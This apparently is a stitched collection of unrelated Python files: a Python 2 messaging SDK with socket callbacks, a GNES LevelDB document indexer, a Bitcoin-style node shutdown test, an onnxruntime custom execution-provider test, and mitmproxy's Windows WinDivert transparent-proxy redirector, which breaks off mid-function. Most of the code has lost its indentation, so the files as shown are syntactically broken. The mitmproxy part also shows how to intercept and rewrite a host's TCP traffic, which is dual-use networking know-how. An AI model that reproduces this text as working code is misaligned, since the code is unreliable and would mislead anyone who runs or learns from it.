def MessageCallback(key = None, isHidden = False, returnType = None):
def _registar(func):
_messageCallbacksList[func.__name__] = { 'Func': func, 'Key' : key, 'DeclareCallback' : not isHidden, 'ReturnType' : returnType }
return func
return _registar
def StateObjectLink(sentinel = '*', package = '*', name = '*', type ='*'):
def _registar(func):
_stateObjectCallbacksList[func.__name__] = { 'Func': func, 'Sentinel' : sentinel, 'Package' : package, 'Name' : name, 'Type' : type }
return func
return _registar
def DeclarePackageDescriptor():
_socket.send_json({ 'Function' : 'DeclarePackageDescriptor' })
def WriteInfo(msg):
WriteLog('Info', msg)
def WriteWarn(msg):
WriteLog('Warn', msg)
def WriteError(msg):
WriteLog('Error', msg)
def WriteLog(level, msg):
_socket.send_json({ 'Function' : 'WriteLog', 'Level' : level, 'Message' : str(msg).encode() })
def PushStateObject(name, value, type = "", metadatas = {}, lifetime = 0):
_socket.send_json({ 'Function' : 'PushStateObject', 'Name': str(name), 'Value': value, 'Type': str(type), 'Metadatas' : metadatas, 'Lifetime' : lifetime })
def SendMessage(to, key, value, scope = MessageScope.package):
_socket.send_json({ 'Function' : 'SendMessage', 'Scope': scope.value, 'To' : str(to), 'Key': str(key), 'Value' : value, 'SagaId' : '' })
def SendMessageWithSaga(callback, to, key, value, scope = MessageScope.package):
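    # Send a message tagged with a new saga id and register a one-shot callback that fires when the matching '__Response' arrives.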
sagaId = str(uuid.uuid1())
def _msgCallback(k, context, data):
if(k == "__Response" and context.SagaId == sagaId):
if not data:
callback(context) if (callback.func_code.co_argcount > 0 and callback.func_code.co_varnames[callback.func_code.co_argcount - 1] == 'context') else callback()
else:
if isinstance(data, list):
if (callback.func_code.co_argcount > 0 and callback.func_code.co_varnames[callback.func_code.co_argcount - 1] == 'context'):
data.append(context)
callback(*data)
else:
callback(data, context) if (callback.func_code.co_argcount > 0 and callback.func_code.co_varnames[callback.func_code.co_argcount - 1] == 'context') else callback(data)
_messageCallbacks.remove(_msgCallback)
_messageCallbacks.append(_msgCallback)
_socket.send_json({ 'Function' : 'SendMessage', 'Scope': scope.value, 'To' : str(to), 'Key': str(key), 'Value' : value, 'SagaId' : sagaId })
def SubscribeMessages(group):
_socket.send_json({ 'Function' : 'SubscribeMessages', 'Group' : str(group) })
def UnSubscribeMessages(group):
_socket.send_json({ 'Function' : 'UnSubscribeMessages', 'Group' : str(group) })
def RefreshSettings():
_socket.send_json({ 'Function' : 'GetSettings' })
def RequestStateObjects(sentinel = '*', package = '*', name = '*', type ='*'):
_socket.send_json({ 'Function' : 'RequestStateObjects', 'Sentinel' : sentinel, 'Package' : package, 'Name' : name, 'Type' : type })
def SubscribeStateObjects(sentinel = '*', package = '*', name = '*', type ='*'):
_socket.send_json({ 'Function' : 'SubscribeStateObjects', 'Sentinel' : sentinel, 'Package' : package, 'Name' : name, 'Type' : type })
def PurgeStateObjects(name = '*', type ='*'):
_socket.send_json({ 'Function' : 'PurgeStateObjects', 'Name' : name, 'Type' : type })
def RegisterStateObjectLinks():
for key in _stateObjectCallbacksList:
soLink = _stateObjectCallbacksList[key]
RegisterStateObjectCallback(soLink['Func'], soLink['Sentinel'], soLink['Package'], soLink['Name'], soLink['Type'])
def RegisterStateObjectCallback(func, sentinel = '*', package = '*', name = '*', type ='*', request = True, subscribe = True):
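    # Wrap 'func' so that it only fires for StateObjects matching the sentinel/package/name/type filter.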
def _soCallback(stateobject):
if((sentinel == stateobject.SentinelName or sentinel == '*') and (package == stateobject.PackageName or package == '*') and (name == stateobject.Name or name == '*') and (type == stateobject.Type or type == '*')):
func(stateobject)
_stateObjectCallbacks.append(_soCallback)
if request == True:
RequestStateObjects(sentinel, package, name, type)
if subscribe == True:
SubscribeStateObjects(sentinel, package, name, type)
def GetSetting(key):
if key in Settings:
return Settings[key]
else:
return None
def RegisterMessageCallbacks():
for key in _messageCallbacksList:
func = _messageCallbacksList[key]['Func']
RegisterMessageCallback(_messageCallbacksList[key]['Key'] if _messageCallbacksList[key]['Key'] else func.__name__, func, _messageCallbacksList[key]['DeclareCallback'], str(func.__doc__) if func.__doc__ else '', _messageCallbacksList[key]['ReturnType'])
def RegisterMessageCallback(key, func, declareCallback = False, description = '', returnType = None):
def _msgCallback(k, context, data):
if(k == key):
returnValue = None
if not data:
returnValue = func(context) if (func.func_code.co_argcount > 0 and func.func_code.co_varnames[func.func_code.co_argcount - 1] == 'context') else func()
else:
if isinstance(data, list):
if (func.func_code.co_argcount > 0 and func.func_code.co_varnames[func.func_code.co_argcount - 1] == 'context'):
data.append(context)
returnValue = func(*data)
else:
returnValue = func(data, context) if (func.func_code.co_argcount > 0 and func.func_code.co_varnames[func.func_code.co_argcount - 1] == 'context') else func(data)
            if context.IsSaga and returnValue != None:
SendResponse(context, returnValue)
_socket.send_json({ 'Function' : 'RegisterMessageCallback', 'Key' : str(key), "DeclareCallback": bool(declareCallback), 'Description' : str(description), 'Arguments' : inspect.getargspec(func).args , 'ReturnType' : returnType if returnType else '' })
_messageCallbacks.append(_msgCallback)
def SendResponse(context, value):
if not context:
WriteError("Invalid context")
elif not context.IsSaga:
WriteError("No Saga on this context")
else:
_socket.send_json({ 'Function' : 'SendMessage', 'Scope': MessageScope.package.value, 'To' : context.Sender.ConnectionId if context.Sender.Type == 0 else context.Sender.FriendlyName, 'Key': '__Response', 'Value' : value, 'SagaId' : context.SagaId })
def Shutdown():
_socket.send_json({ 'Function' : 'Shutdown' })
def _onReceiveMessage(key, context, data):
try:
for mc in _messageCallbacks:
mc(key, context, data)
except Exception, e:
WriteError("Error while dispatching message '%s': %s" % (key, str(e)))
pass
def _onStateObjectUpdated(stateObject):
try:
for callback in _stateObjectCallbacks:
callback(stateObject)
except Exception, e:
WriteError("Error while dispatching stateObject : %s" % str(e))
pass
def _exit():
global IsRunning
IsRunning = False
if OnExitCallback:
try:
OnExitCallback()
except:
pass
sys.exit()
def _dispatcherMessage():
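    # Background loop: poll the ZeroMQ socket and dispatch incoming messages according to their 'Type' field.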
global Settings
global HasControlManager
global IsConnected
global IsStandAlone
global SentinelName
global PackageName
global PackageInstanceName
global PackageVersion
global PackageAssemblyVersion
global ConstellationClientVersion
global LastStateObjects
while IsRunning:
try:
socks = dict(_poller.poll(1000))
if socks:
message = _socket.recv_json()
if message['Type'] == "PACKAGESTATE":
HasControlManager = message['HasControlManager']
IsConnected = message['IsConnected']
IsStandAlone = message['IsStandAlone']
SentinelName = message['SentinelName']
PackageName = message['PackageName']
PackageInstanceName = message['PackageInstanceName']
PackageVersion = message['PackageVersion']
PackageAssemblyVersion = message['PackageAssemblyVersion']
ConstellationClientVersion = message['ConstellationClientVersion']
elif message['Type'] == "LASTSTATEOBJECTS":
LastStateObjects = []
for so in message['StateObjects']:
LastStateObjects.append(ConvertJsonToObject(so, 'StateObject'))
if OnLastStateObjectsReceived:
try:
OnLastStateObjectsReceived()
except:
pass
elif message['Type'] == "CONNECTIONSTATE":
IsConnected = message['IsConnected']
if OnConnectionChanged:
try:
OnConnectionChanged()
except:
pass
elif message['Type'] == "MSG":
def _addSendResponse(tuple):
tuple.SendResponse = lambda ctx, rsp: SendResponse(ctx, rsp)
context = ConvertJsonToObject(message['Context'], 'MessageContext', _addSendResponse)
if 'Data' in message:
try:
data = ConvertJsonToObject(message['Data'])
except:
data = message['Data']
_onReceiveMessage(message['Key'], context, data)
else:
_onReceiveMessage(message['Key'], context, "")
elif message['Type'] == "SETTINGS":
Settings = message['Settings']
elif message['Type'] == "STATEOBJECT":
try:
so = ConvertJsonToObject(message['StateObject'], 'StateObject')
except:
WriteError("Unable to deserialize the StateObject")
_onStateObjectUpdated(so)
elif message['Type'] == "EXIT":
_exit()
except:
pass
def Start(onStart = None):
StartAsync()
if onStart:
msgCb = len(_messageCallbacks)
try:
onStart()
except Exception, e:
WriteError("Fatal error: %s" % str(e))
_exit()
if len(_messageCallbacks) > msgCb:
DeclarePackageDescriptor()
while IsRunning:
time.sleep(0.1)
def StartAsync():
global IsRunning
RegisterStateObjectLinks()
RegisterMessageCallbacks()
if len(_messageCallbacks) > 0:
DeclarePackageDescriptor()
t1 = Thread(target = _dispatcherMessage)
t1.setDaemon(True)
IsRunning = True
t1.start()
RefreshSettings()
while Settings is None:
time.sleep(1.0)
|
leveldb.py
|
# Tencent is pleased to support the open source community by making GNES available.
#
# Copyright (C) 2019 THL A29 Limited, a Tencent company. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pickle
from threading import Thread, Event
from typing import List, Any
from ..base import BaseTextIndexer
from ...proto import gnes_pb2
class LVDBIndexer(BaseTextIndexer):
def __init__(self, data_path: str,
keep_na_doc: bool = True,
drop_raw_bytes: bool = False,
drop_chunk_blob: bool = False,
*args, **kwargs):
super().__init__(*args, **kwargs)
self.data_path = data_path
self.keep_na_doc = keep_na_doc
self.drop_raw_bytes = drop_raw_bytes
self.drop_chunk_blob = drop_chunk_blob
self._NOT_FOUND = None
def post_init(self):
import plyvel
self._db = plyvel.DB(self.data_path, create_if_missing=True)
def add(self, keys: List[int], docs: List['gnes_pb2.Document'], *args, **kwargs):
with self._db.write_batch() as wb:
for k, d in zip(keys, docs):
doc_id = pickle.dumps(k)
if self.drop_raw_bytes:
d.raw_bytes = b''
if self.drop_chunk_blob:
for i in range(len(d.chunks)):
d.chunks[i].ClearField('blob')
doc = d.SerializeToString()
wb.put(doc_id, doc)
def query(self, keys: List[int], *args, **kwargs) -> List['gnes_pb2.Document']:
res = []
for k in keys:
doc_id = pickle.dumps(k)
v = self._db.get(doc_id)
doc = gnes_pb2.Document()
if v is not None:
doc.ParseFromString(v)
res.append(doc)
elif self.keep_na_doc:
res.append(self._NOT_FOUND)
return res
def close(self):
super().close()
self._db.close()
class AsyncLVDBIndexer(LVDBIndexer):
def post_init(self):
super().post_init()
self._is_listening = Event()
self._is_listening.set()
self._is_idle = Event()
self._is_idle.set()
self._jobs = []
self._thread = Thread(target=self._db_write)
        self._thread.daemon = True
self._thread.start()
def add(self, keys: List[int], docs: List['gnes_pb2.Document'], *args, **kwargs):
self._jobs.append((keys, docs))
def query(self, *args, **kwargs) -> List[Any]:
self._is_idle.wait()
return super().query(*args, **kwargs)
def _db_write(self):
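        # Background writer: drain queued (keys, docs) jobs into LevelDB; '_is_idle' blocks queries while a write is in progress.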
while self._is_listening.is_set():
while self._jobs:
self._is_idle.clear()
keys, docs = self._jobs.pop()
super().add(keys, docs)
self._is_idle.set()
def close(self):
self._jobs.clear()
self._is_listening.clear()
self._is_idle.wait()
self._thread.join()
super().close()
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test elcashd shutdown."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy, wait_until
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.supports_cli = False
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2)
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure event loop waits for current connections
# to close.
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
ort_eps_test.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import unittest
import torch
import onnxruntime_pybind11_state as torch_ort
import os
import sys
def is_windows():
return sys.platform.startswith("win")
from io import StringIO
import sys
import threading
import time
class OutputGrabber(object):
"""
Class used to grab standard output or another stream.
"""
escape_char = "\b"
def __init__(self, stream=None, threaded=False):
self.origstream = stream
self.threaded = threaded
if self.origstream is None:
self.origstream = sys.stdout
self.origstreamfd = self.origstream.fileno()
self.capturedtext = ""
# Create a pipe so the stream can be captured:
self.pipe_out, self.pipe_in = os.pipe()
def __enter__(self):
self.start()
return self
def __exit__(self, type, value, traceback):
self.stop()
def start(self):
"""
Start capturing the stream data.
"""
self.capturedtext = ""
# Save a copy of the stream:
self.streamfd = os.dup(self.origstreamfd)
# Replace the original stream with our write pipe:
os.dup2(self.pipe_in, self.origstreamfd)
if self.threaded:
# Start thread that will read the stream:
self.workerThread = threading.Thread(target=self.readOutput)
self.workerThread.start()
# Make sure that the thread is running and os.read() has executed:
time.sleep(0.01)
def stop(self):
"""
Stop capturing the stream data and save the text in `capturedtext`.
"""
# Print the escape character to make the readOutput method stop:
self.origstream.write(self.escape_char)
# Flush the stream to make sure all our data goes in before
# the escape character:
self.origstream.flush()
if self.threaded:
# wait until the thread finishes so we are sure that
# we have until the last character:
self.workerThread.join()
else:
self.readOutput()
# Close the pipe:
os.close(self.pipe_in)
os.close(self.pipe_out)
# Restore the original stream:
os.dup2(self.streamfd, self.origstreamfd)
# Close the duplicate stream:
os.close(self.streamfd)
def readOutput(self):
"""
Read the stream data (one byte at a time)
and save the text in `capturedtext`.
"""
while True:
char = os.read(self.pipe_out,1).decode(self.origstream.encoding)
if not char or self.escape_char in char:
break
self.capturedtext += char
class OrtEPTests(unittest.TestCase):
def get_test_execution_provider_path(self):
if is_windows():
return os.path.join('.', 'test_execution_provider.dll')
else:
return os.path.join('.', 'libtest_execution_provider.so')
def test_import_custom_eps(self):
torch_ort.set_device(0, 'CPUExecutionProvider', {})
torch_ort._register_provider_lib('TestExecutionProvider', self.get_test_execution_provider_path(), {})
# capture std out
with OutputGrabber() as out:
torch_ort.set_device(1, 'TestExecutionProvider', {'device_id':'0', 'some_config':'val'})
ort_device = torch_ort.device(1)
assert 'My EP provider created, with device id: 0, some_option: val' in out.capturedtext
with OutputGrabber() as out:
torch_ort.set_device(2, 'TestExecutionProvider', {'device_id':'1', 'some_config':'val'})
ort_device = torch_ort.device(1)
assert 'My EP provider created, with device id: 1, some_option: val' in out.capturedtext
# test the reusing EP instance
with OutputGrabber() as out:
torch_ort.set_device(3, 'TestExecutionProvider', {'device_id':'0', 'some_config':'val'})
ort_device = torch_ort.device(1)
assert 'My EP provider created, with device id: 0, some_option: val' not in out.capturedtext
# test clear training ep instance pool
torch_ort.clear_training_ep_instances()
with OutputGrabber() as out:
torch_ort.set_device(3, 'TestExecutionProvider', {'device_id':'0', 'some_config':'val'})
ort_device = torch_ort.device(1)
assert 'My EP provider created, with device id: 0, some_option: val' in out.capturedtext
#disable the print test for now as we need to merge a PR to pytorch first.
#def test_print(self):
# x = torch.ones(1, 2)
# ort_x = x.to('ort')
# with OutputGrabber() as out:
# print(ort_x)
# assert "tensor([[1., 1.]], device='ort:0')" in out.capturedtext
if __name__ == '__main__':
unittest.main()
|
windows.py
|
import contextlib
import ctypes
import ctypes.wintypes
import io
import json
import os
import re
import socket
import socketserver
import threading
import time
import typing
import click
import collections
import collections.abc
import pydivert
import pydivert.consts
if typing.TYPE_CHECKING:
class WindowsError(OSError):
@property
def winerror(self) -> int:
return 42
REDIRECT_API_HOST = "127.0.0.1"
REDIRECT_API_PORT = 8085
##########################
# Resolver
def read(rfile: io.BufferedReader) -> typing.Any:
x = rfile.readline().strip()
if not x:
return None
return json.loads(x)
def write(data, wfile: io.BufferedWriter) -> None:
wfile.write(json.dumps(data).encode() + b"\n")
wfile.flush()
class Resolver:
sock: socket.socket
lock: threading.RLock
def __init__(self):
self.sock = None
self.lock = threading.RLock()
def setup(self):
with self.lock:
TransparentProxy.setup()
self._connect()
def _connect(self):
if self.sock:
self.sock.close()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((REDIRECT_API_HOST, REDIRECT_API_PORT))
self.wfile = self.sock.makefile('wb')
self.rfile = self.sock.makefile('rb')
write(os.getpid(), self.wfile)
def original_addr(self, csock: socket.socket):
ip, port = csock.getpeername()[:2]
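        # Normalize the address: strip the IPv4-mapped IPv6 prefix ("::ffff:") and any IPv6 zone id ("%...").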
        ip = re.sub(r"^::ffff:(?=\d+\.\d+\.\d+\.\d+$)", "", ip)
ip = ip.split("%", 1)[0]
with self.lock:
try:
write((ip, port), self.wfile)
addr = read(self.rfile)
if addr is None:
raise RuntimeError("Cannot resolve original destination.")
return tuple(addr)
except (EOFError, OSError, AttributeError):
self._connect()
return self.original_addr(csock)
class APIRequestHandler(socketserver.StreamRequestHandler):
"""
    TransparentProxy API: returns the JSON-encoded (server address, port) tuple
    for each received (client address, port) tuple.
"""
def handle(self):
proxifier: TransparentProxy = self.server.proxifier
try:
pid: int = read(self.rfile)
if pid is None:
return
with proxifier.exempt(pid):
while True:
c = read(self.rfile)
if c is None:
return
try:
server = proxifier.client_server_map[tuple(c)]
except KeyError:
server = None
write(server, self.wfile)
except (EOFError, OSError):
pass
class APIServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
def __init__(self, proxifier, *args, **kwargs):
super().__init__(*args, **kwargs)
self.proxifier = proxifier
self.daemon_threads = True
##########################
# Windows API
# from Windows' error.h
ERROR_INSUFFICIENT_BUFFER = 0x7A
IN6_ADDR = ctypes.c_ubyte * 16
IN4_ADDR = ctypes.c_ubyte * 4
#
# IPv6
#
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa366896(v=vs.85).aspx
class MIB_TCP6ROW_OWNER_PID(ctypes.Structure):
_fields_ = [
('ucLocalAddr', IN6_ADDR),
('dwLocalScopeId', ctypes.wintypes.DWORD),
('dwLocalPort', ctypes.wintypes.DWORD),
('ucRemoteAddr', IN6_ADDR),
('dwRemoteScopeId', ctypes.wintypes.DWORD),
('dwRemotePort', ctypes.wintypes.DWORD),
('dwState', ctypes.wintypes.DWORD),
('dwOwningPid', ctypes.wintypes.DWORD),
]
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa366905(v=vs.85).aspx
def MIB_TCP6TABLE_OWNER_PID(size):
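    # Generated per call because the length of the row array is only known at runtime.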
class _MIB_TCP6TABLE_OWNER_PID(ctypes.Structure):
_fields_ = [
('dwNumEntries', ctypes.wintypes.DWORD),
('table', MIB_TCP6ROW_OWNER_PID * size)
]
return _MIB_TCP6TABLE_OWNER_PID()
#
# IPv4
#
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa366913(v=vs.85).aspx
class MIB_TCPROW_OWNER_PID(ctypes.Structure):
_fields_ = [
('dwState', ctypes.wintypes.DWORD),
('ucLocalAddr', IN4_ADDR),
('dwLocalPort', ctypes.wintypes.DWORD),
('ucRemoteAddr', IN4_ADDR),
('dwRemotePort', ctypes.wintypes.DWORD),
('dwOwningPid', ctypes.wintypes.DWORD),
]
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa366921(v=vs.85).aspx
def MIB_TCPTABLE_OWNER_PID(size):
class _MIB_TCPTABLE_OWNER_PID(ctypes.Structure):
_fields_ = [
('dwNumEntries', ctypes.wintypes.DWORD),
('table', MIB_TCPROW_OWNER_PID * size)
]
return _MIB_TCPTABLE_OWNER_PID()
TCP_TABLE_OWNER_PID_CONNECTIONS = 4
class TcpConnectionTable(collections.abc.Mapping):
DEFAULT_TABLE_SIZE = 4096
def __init__(self):
self._tcp = MIB_TCPTABLE_OWNER_PID(self.DEFAULT_TABLE_SIZE)
self._tcp_size = ctypes.wintypes.DWORD(self.DEFAULT_TABLE_SIZE)
self._tcp6 = MIB_TCP6TABLE_OWNER_PID(self.DEFAULT_TABLE_SIZE)
self._tcp6_size = ctypes.wintypes.DWORD(self.DEFAULT_TABLE_SIZE)
self._map = {}
def __getitem__(self, item):
return self._map[item]
def __iter__(self):
return self._map.__iter__()
def __len__(self):
return self._map.__len__()
def refresh(self):
self._map = {}
self._refresh_ipv4()
self._refresh_ipv6()
def _refresh_ipv4(self):
ret = ctypes.windll.iphlpapi.GetExtendedTcpTable(
ctypes.byref(self._tcp),
ctypes.byref(self._tcp_size),
False,
socket.AF_INET,
TCP_TABLE_OWNER_PID_CONNECTIONS,
0
)
if ret == 0:
for row in self._tcp.table[:self._tcp.dwNumEntries]:
local_ip = socket.inet_ntop(socket.AF_INET, bytes(row.ucLocalAddr))
local_port = socket.htons(row.dwLocalPort)
self._map[(local_ip, local_port)] = row.dwOwningPid
elif ret == ERROR_INSUFFICIENT_BUFFER:
self._tcp = MIB_TCPTABLE_OWNER_PID(self._tcp_size.value)
# no need to update size, that's already done.
self._refresh_ipv4()
else:
raise RuntimeError("[IPv4] Unknown GetExtendedTcpTable return code: %s" % ret)
def _refresh_ipv6(self):
ret = ctypes.windll.iphlpapi.GetExtendedTcpTable(
ctypes.byref(self._tcp6),
ctypes.byref(self._tcp6_size),
False,
socket.AF_INET6,
TCP_TABLE_OWNER_PID_CONNECTIONS,
0
)
if ret == 0:
for row in self._tcp6.table[:self._tcp6.dwNumEntries]:
local_ip = socket.inet_ntop(socket.AF_INET6, bytes(row.ucLocalAddr))
local_port = socket.htons(row.dwLocalPort)
self._map[(local_ip, local_port)] = row.dwOwningPid
elif ret == ERROR_INSUFFICIENT_BUFFER:
self._tcp6 = MIB_TCP6TABLE_OWNER_PID(self._tcp6_size.value)
# no need to update size, that's already done.
self._refresh_ipv6()
else:
raise RuntimeError("[IPv6] Unknown GetExtendedTcpTable return code: %s" % ret)
def get_local_ip() -> typing.Optional[str]:
# Auto-Detect local IP. This is required as re-injecting to 127.0.0.1 does not work.
# https://stackoverflow.com/questions/166506/finding-local-ip-addresses-using-pythons-stdlib
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except OSError:
return None
finally:
s.close()
def get_local_ip6(reachable: str) -> typing.Optional[str]:
# The same goes for IPv6, with the added difficulty that .connect() fails if
# the target network is not reachable.
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
try:
s.connect((reachable, 80))
return s.getsockname()[0]
except OSError:
return None
finally:
s.close()
class Redirect(threading.Thread):
daemon = True
windivert: pydivert.WinDivert
def __init__(
self,
handle: typing.Callable[[pydivert.Packet], None],
filter: str,
layer: pydivert.Layer = pydivert.Layer.NETWORK,
flags: pydivert.Flag = 0
) -> None:
self.handle = handle
self.windivert = pydivert.WinDivert(filter, layer, flags=flags)
super().__init__()
def start(self):
self.windivert.open()
super().start()
def run(self):
while True:
try:
packet = self.windivert.recv()
except WindowsError as e:
if e.winerror == 995:
return
else:
raise
else:
self.handle(packet)
def shutdown(self):
self.windivert.close()
def recv(self) -> typing.Optional[pydivert.Packet]:
"""
Convenience function that receives a packet from the passed handler and handles error codes.
If the process has been shut down, None is returned.
"""
try:
return self.windivert.recv()
except WindowsError as e:
if e.winerror == 995:
return None
else:
raise
class RedirectLocal(Redirect):
trusted_pids: typing.Set[int]
def __init__(
self,
redirect_request: typing.Callable[[pydivert.Packet], None],
filter: str
) -> None:
self.tcp_connections = TcpConnectionTable()
self.trusted_pids = set()
self.redirect_request = redirect_request
super().__init__(self.handle, filter)
def handle(self, packet):
client = (packet.src_addr, packet.src_port)
if client not in self.tcp_connections:
self.tcp_connections.refresh()
# If this fails, we most likely have a connection from an external client.
        # In this case, we always want to proxy the request.
pid = self.tcp_connections.get(client, None)
if pid not in self.trusted_pids:
self.redirect_request(packet)
else:
# It's not really clear why we need to recalculate the checksum here,
# but this was identified as necessary in https://github.com/mitmproxy/mitmproxy/pull/3174.
self.windivert.send(packet, recalculate_checksum=True)
TConnection = typing.Tuple[str, int]
class ClientServerMap:
"""A thread-safe LRU dict."""
connection_cache_size: typing.ClassVar[int] = 65536
def __init__(self):
self._lock = threading.Lock()
self._map = collections.OrderedDict()
def __getitem__(self, item: TConnection) -> TConnection:
with self._lock:
return self._map[item]
def __setitem__(self, key: TConnection, value: TConnection) -> None:
with self._lock:
self._map[key] = value
self._map.move_to_end(key)
while len(self._map) > self.connection_cache_size:
self._map.popitem(False)
class TransparentProxy:
"""
Transparent Windows Proxy for mitmproxy based on WinDivert/PyDivert. This module can be used to
redirect both traffic that is forwarded by the host and traffic originating from the host itself.
Requires elevated (admin) privileges. Can be started separately by manually running the file.
How it works:
    (1) First, we intercept all packets that match our filter.
We both consider traffic that is forwarded by the OS (WinDivert's NETWORK_FORWARD layer) as well
as traffic sent from the local machine (WinDivert's NETWORK layer). In the case of traffic from
the local machine, we need to exempt packets sent from the proxy to not create a redirect loop.
To accomplish this, we use Windows' GetExtendedTcpTable syscall and determine the source
application's PID.
    For each intercepted packet, we
        1. Store the source -> destination mapping (address and port)
        2. Remove the packet from the network (by not reinjecting it).
        3. Re-inject the packet into the local network stack, but with the destination address
           changed to the proxy.
(2) Next, the proxy receives the forwarded packet, but does not know the real destination yet
(which we overwrote with the proxy's address). On Linux, we would now call
getsockopt(SO_ORIGINAL_DST). We now access the redirect module's API (see APIRequestHandler),
submit the source information and get the actual destination back (which we stored in 1.1).
(3) The proxy now establishes the upstream connection as usual.
(4) Finally, the proxy sends the response back to the client. To make it work, we need to change
the packet's source address back to the original destination (using the mapping from 1.1),
to which the client believes it is talking to.
Limitations:
- We assume that ephemeral TCP ports are not re-used for multiple connections at the same time.
The proxy will fail if an application connects to example.com and example.org from
192.168.0.42:4242 simultaneously. This could be mitigated by introducing unique "meta-addresses"
which mitmproxy sees, but this would remove the correct client info from mitmproxy.
"""
local: typing.Optional[RedirectLocal] = None
# really weird linting error here.
forward: typing.Optional[Redirect] = None # noqa
response: Redirect
icmp: Redirect
proxy_port: int
filter: str
client_server_map: ClientServerMap
def __init__(
self,
local: bool = True,
forward: bool = True,
proxy_port: int = 8080,
filter: typing.Optional[str] = "tcp.DstPort == 80 or tcp.DstPort == 443",
) -> None:
self.proxy_port = proxy_port
self.filter = (
filter
or
f"tcp.DstPort != {proxy_port} and tcp.DstPort != {REDIRECT_API_PORT} and tcp.DstPort < 49152"
)
self.ipv4_address = get_local_ip()
self.ipv6_address = get_local_ip6("2001:4860:4860::8888")
# print(f"IPv4: {self.ipv4_address}, IPv6: {self.ipv6_address}")
self.client_server_map = ClientServerMap()
self.api = APIServer(self, (REDIRECT_API_HOST, REDIRECT_API_PORT), APIRequestHandler)
self.api_thread = threading.Thread(target=self.api.serve_forever)
self.api_thread.daemon = True
if forward:
self.forward = Redirect(
self.redirect_request,
self.filter,
pydivert.Layer.NETWORK_FORWARD
)
if local:
self.local = RedirectLocal(
self.redirect_request,
self.filter
)
# The proxy server responds to the client. To the client,
# this response should look like it has been sent by the real target
self.response = Redirect(
self.redirect_response,
f"outbound and tcp.SrcPort == {proxy_port}",
)
# Block all ICMP requests (which are sent on Windows by default).
# If we don't do this, our proxy machine may send an ICMP redirect to the client,
# which instructs the client to directly connect to the real gateway
# if they are on the same network.
self.icmp = Redirect(
lambda _: None,
"icmp",
flags=pydivert.Flag.DROP
)
@classmethod
def setup(cls):
# TODO: Make sure that server can be killed cleanly. That's a bit difficult as we don't have access to
# controller.should_exit when this is called.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_unavailable = s.connect_ex((REDIRECT_API_HOST, REDIRECT_API_PORT))
if server_unavailable:
proxifier = TransparentProxy()
proxifier.start()
def start(self):
self.api_thread.start()
self.icmp.start()
self.response.start()
if self.forward:
self.forward.start()
if self.local:
self.local.start()
def shutdown(self):
if self.local:
self.local.shutdown()
if self.forward:
self.forward.shutdown()
self.response.shutdown()
self.icmp.shutdown()
self.api.shutdown()
def redirect_request(self, packet: pydivert.Packet):
# print(" * Redirect client -> server to proxy")
# print(f"{packet.src_addr}:{packet.src_port} -> {packet.dst_addr}:{packet.dst_port}")
client = (packet.src_addr, packet.src_port)
self.client_server_map[client] = (packet.dst_addr, packet.dst_port)
# We do need to inject to an external IP here, 127.0.0.1 does not work.
if packet.address_family == socket.AF_INET:
assert self.ipv4_address
packet.dst_addr = self.ipv4_address
elif packet.address_family == socket.AF_INET6:
if not self.ipv6_address:
self.ipv6_address = get_local_ip6(packet.src_addr)
assert self.ipv6_address
packet.dst_addr = self.ipv6_address
else:
raise RuntimeError("Unknown address family")
packet.dst_port = self.proxy_port
packet.direction = pydivert.consts.Direction.INBOUND
# We need a handle on the NETWORK layer. the local handle is not guaranteed to exist,
# so we use the response handle.
self.response.windivert.send(packet)
def redirect_response(self, packet: pydivert.Packet):
"""
If the proxy responds to the client, let the client believe the target server sent the
packets.
"""
# print(" * Adjust proxy -> client")
client = (packet.dst_addr, packet.dst_port)
try:
packet.src_addr, packet.src_port = self.client_server_map[client]
except KeyError:
print(f"Warning: Previously unseen connection from proxy to {client}")
else:
packet.recalculate_checksums()
self.response.windivert.send(packet, recalculate_checksum=False)
@contextlib.contextmanager
def exempt(self, pid: int):
if self.local:
self.local.trusted_pids.add(pid)
try:
yield
finally:
if self.local:
self.local.trusted_pids.remove(pid)
@click.group()
def cli():
pass
@cli.command()
@click.option("--local/--no-local", default=True,
help="Redirect the host's own traffic.")
@click.option("--forward/--no-forward", default=True,
help="Redirect traffic that's forwarded by the host.")
@click.option("--filter", type=str, metavar="WINDIVERT_FILTER",
help="Custom WinDivert interception rule.")
@click.option("-p", "--proxy-port", type=int, metavar="8080", default=8080,
help="The port mitmproxy is listening on.")
def redirect(**options):
"""Redirect flows to mitmproxy."""
proxy = TransparentProxy(**options)
proxy.start()
print(f" * Redirection active.")
print(f" Filter: {proxy.filter}")
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
